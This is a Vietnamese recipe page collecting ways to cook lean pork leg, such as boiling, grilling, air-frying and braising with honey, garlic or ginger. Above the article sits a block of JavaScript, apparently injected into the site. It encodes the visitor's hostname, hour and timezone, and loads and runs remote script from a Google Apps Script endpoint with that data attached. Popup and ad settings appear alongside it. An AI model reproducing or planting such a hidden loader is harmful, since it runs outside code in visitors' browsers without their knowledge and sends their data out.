var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Nạc đùi heo làm gì ngon? Top 19 cách chế biến nạc đùi ngon nhất

Nạc đùi heo không còn xa lạ với nhiều người nhất là với chị em nội trợ. Nạc đùi heo thường được các chị làm món luộc chấm mắm tôm, mắm cái, mắm tỏi ớt rất ngon hoặc kho tiêu, kho tàu. Những món này dễ làm nhưng ăn hoài rất dễ gây ngán.

Có rất nhiều cách khác để chế biến nạc đùi heo với nhiều hương vị, các gia vị mới sẽ giúp bữa ăn thêm đa dạng, món ăn tuy quen thuộc nhưng mới lạ, ngon miệng. Sau đây là tất tần tật 19 món ăn chế biến từ nạc đùi heo mọi người có thể tham khảo cho thực đơn hằng ngày của mình.

Tổng hợp 19 món ăn chế biến từ nạc đùi heo ngon, dễ làm

Nạc đùi heo luộc chấm mắm tôm hoặc mắm cái rất ngon

Nạc đùi heo luộc là cách chế biến đơn giản nhất, tốn ít thời gian nhưng hiệu quả cho món ăn rất ngon như chấm với mắm tôm, mắm cái là hết sẩy.

Nạc đùi heo luộc chấm nước mắm mặn tỏi ớt

Nạc đùi heo luộc chấm mắm tỏi ớt cũng rất tuyệt vời. Thịt luộc ngọt ngây ăn kèm với rau với bún, nước mắm cá cơm thơm ngon hòa quyện với hương vị cay nồng của tỏi ớt dã nhuyễn. Món bún thịt luộc này sẽ khiến nhiều người no bụng cả ngày đây. Ngoài ra món này ăn kèm với cơm nóng cũng rất ngon. Mấu chốt nằm ở chén mắm tỏi, muốn nước chấm ngon tỏi phải là tỏi Lý Sơn, ớt phải cay, vắt thêm chanh, tí đường, tiêu sẽ rất hấp dẫn.

Nạc đùi heo luộc ăn với trứng

Nguyên liệu:

  • 300 g thịt ba rọi hay thịt nạc đùi heo đều ngon
  • 3 trứng vịt
  • 1/2 bắp cải, ớt, nước mắm ngon

Cách làm:

  • Nạc đùi heo rửa sạch với muối. trứng rửa sạch. bắp cải tách lá rửa sạch
  • Luộc thịt, luộc trứng hồng đào, luộc bắp cải vừa chín tới.
  • Lấy nước mắm mặn ngon với vài lát ớt 🌶ra dĩa để chấm.
  • Nạc đùi heo thái mỏng, trứng luộc cắt làm bốn, bắp cải cho ra dĩa. Món này ăn rất bắt cơm. hôm nay minh quên mua bắp cải, có thể ăn với cà chua, dưa chuột cũng 🥒được 🍅.

Nạc đùi heo nướng mắm

Nguyên liệu:

  • 400 g thịt đùi heo
  • 1/2 muỗng mắm ngon

Cách làm

  • Thịt đùi heo mình bỏ phần da và mỡ. (Nếu thích bạn cứ để nha.) rửa sạch sẽ để ráo. Cho mắm vào thịt trộn đều ướp cho thấm
  • Rồi cho vào lò nướng. Chọn chế độ grill nướng 20 phút
  • Thấy thịt chín vàng đều lấy ra dĩa
  • Món này nhà mình ăn cùng cơm kèm dưa leo

Nạc đùi heo nướng muối, tiêu – Air Fryer

Nguyên Liệu

  • 500 g nạc đùi heo phần nhiều nạc
  • 1/2 tsp muối
  • 1/2 tsp tiêu
  • 1 viên bột tỏi
  • 1 viên bột hành
  • 1/2 tsp dầu mè
  • 1/2 miếng chanh

Các bước

  • Nạc đùi heo rửa sạch lau cho khô. Lấy 1 chén nhỏ cho bột hành, tỏi, muối, tiêu, dầu mè vào trộn đều rồi chà sát lên phần có thịt, phần da để yên.
  • Ướp khoảng 8 tiếng. Hoặc sáng ướp đầu giờ chiều có thể đem nướng. Lấy thịt ra chà miếng chanh lên phần da. Đặt miếng thịt vào, úp phần da xuống nướng ở nhiệt độ 300 độ khoảng 20 phút lần1.
  • Lần 2 úp phần thịt xuống nướng 400 độ khoảng 20 phút. Lần cuối úp da lên và nướng 300 độ khoảng 10 phút là được.

Thịt nạc đùi heo kho tiêu

Nguyên Liệu

  • 4-5 người
  • 700 g nạc đùi heo
  • Nước mắm, đường, tiêu, ớt, nước màu
  • Củ hành, tỏi

Các bước

  • Miếng thịt nạc đùi cắt miếng vừa ăn, rửa sạch với muối. Ướp thịt với 1 m canh củ hành tỏi băm nhỏ+3 m canh nước mắm+ 1 m canh nước màu (nhà làm)+chút nước tương (cho màu đẹp hơn)+1/2 mcf đường,ít tiêu. Ướp khoảng 30′
  • Cho ít dầu vào chảo phi thơm ít củ hành tỏi băm xào thịt. Thịt săn thấm gia vị (thêm ớt tuỳ thích), thêm ít nước kho đến khi thịt thấm đều, nêm nếm lại vừa khẩu vị. Nước kho còn sâm sấp thịt là được

Thịt nạc đùi heo khìa nước dừa tươi xanh

Nguyên Liệu

  • 500 g Nạc đùi heo
  • 1 quả Dừa tươi
  • Nươc mắm, đường ,hạt nêm
  • 3 củ Hành tím

Các bước

  • Thịt nạc đùi heo rửa sạch,cắt thành miếng dày 4 cm.
  • Hành tím bỏ vỏ,băm nhuyễn.ướp thịt voi 2 m canh nước mắm,1,5 m canh đường,1m cà phê hat nem.
  • Sau đó cho nước dừa tươi vao kho thịt.đe lửa nhỏ cho thịt mềm.đun tới lúc sắc nước thi tắt bếp.va mang ra dùng bữa.hihi.

Thịt nạc đùi heo rim mật ong

Nguyên Liệu

  • 1-2 người ăn
  • 200 gr Thịt đùi nạc
  • 2 Tbsp Mật ong
  • 1 Tbsp Nước tương maggi hoặc nước mắm
  • 1+1/2 tsp muối
  • 1 tsp Gừng bằm nhuyễn
  • 1 tsp Tỏi bằm nhuyễn
  • 1 Tbsp Dầu ăn

Các bước

  • Trộn đều tất cả nguyên liệu rồi ướp qua đêm trong tủ lạnh.
  • Làm nóng chảo với dầu rồi thêm thịt đã ướp (cả nước ướp thịt)rim lửa nhỏ đến khi chín đều và nước sệt lại là được.
  • Ăn với cơm 🍚 là ngon hết sảy.

Thịt nạc đùi heo kho tỏi cô đơn

Nguyên Liệu

  • 800 g thịt giò heo hoặc thịt đùi heo
  • 150-200 g tỏi cô đơn
  • 3 muỗng mắm
  • 2 muỗng đường
  • 1 muỗng mật ong
  • 1/3 muỗng cafe tiêu
  • 1 muỗng rượu mai quế lộ(tuỳ thích)
  • 2 hoa hồi
  • 1 muỗng canh dầu ăn

Các bước

  • Nạc đùi heo rửa sạch, để ráo rồi cắt miếng khoảng 5cm. Ướp với gia vị, dùng màng thực phẩm đậy lại, cho vào tủ lạnh để 2h hoặc qua đêm cho thấm gia vị.
  • Làm nóng chảo cho tỏi, dầu ăn vào phi cho dậy mùi thơm, rồi cho thịt vào chiên vàng(đường và gia vị sẽ chuyển màu vàng nâu nhẹ) tắt bếp! 2 phút sau thì cho nước lọc vào xấp xấp mặt thịt, thêm 2 hoa hồi và tỏi cô đơn vào. Khi sôi lên vớt sạch bọt. Hạ lửa vừa nấu cho đến khi cạn nước kho sệt sệt là được! Lúc này có thể nêm lại cho vừa theo khẩu vị nhé! Sau đó cho ra dĩa trang trí thêm hành ngò cho đẹp nè!
  • Món này rất thơm ngon, bùi bùi của tỏi nữa khá thú vị luôn! Dùng với cơm nóng là hết ý luôn nha! Còn chần chừ gì mà không cho vào menu ngày tết nhỉ.

Thịt nạc đùi heo kho gừng

Nguyên Liệu

  • 5 phần ăn
  • 1 kg thịt nạc đùi heo
  • 80 g gừng cắt sợi
  • 2 muỗng tỏi hành tím
  • 5 muỗng mắm
  • 1 muỗng đường
  • 1/2 muỗng cafe tiêu
  • 2 muỗng dầu hào

Các bước

  • Thịt nạc đùi rửa sạch để ráo, rồi ướp với gia vị trừ gừng nha! Mình ướp 1 muỗng đường vì nếu cho nhiều khi chiên sẽ bị cháy đó nha
  • Cho thịt vào chảo chiên vàng đều, vớt ra dĩa cho nguội xíu
  • Sau đó cắt miếng như ngón tay là được. Gừng cắt sợi nhỏ. Rồi làm nóng chảo cho dầu ăn với hành tím tỏi vào phi cho dậy mùi, rồi cho thịt và gừng vào, thêm chén nước và nước chiên thịt lúc nãy vào luôn sao cho gần xấp xấp mặt thịt
  • Nấu sôi lên nêm thêm đường, bột ngọt, mắm sao cho vừa khẩu vị (nhạt một xíu để khi rút nước sẽ mặn lại hơn chút á nha) hạ nhỏ lửa, đậy nắp lại hé hé thôi, thỉnh thoảng đảo thịt cho thấm đều.Nấu đến khi thấy nước cạn còn 1/3 là được. Lúc này nêm lại điều chỉnh theo khẩu vị(mặn_lạt_ ngọt nhẹ) mỗi nhà.

Nạc đùi heo chiên giòn

Nạc đùi heo chiên nước mắm

Nạc đùi heo áp chảo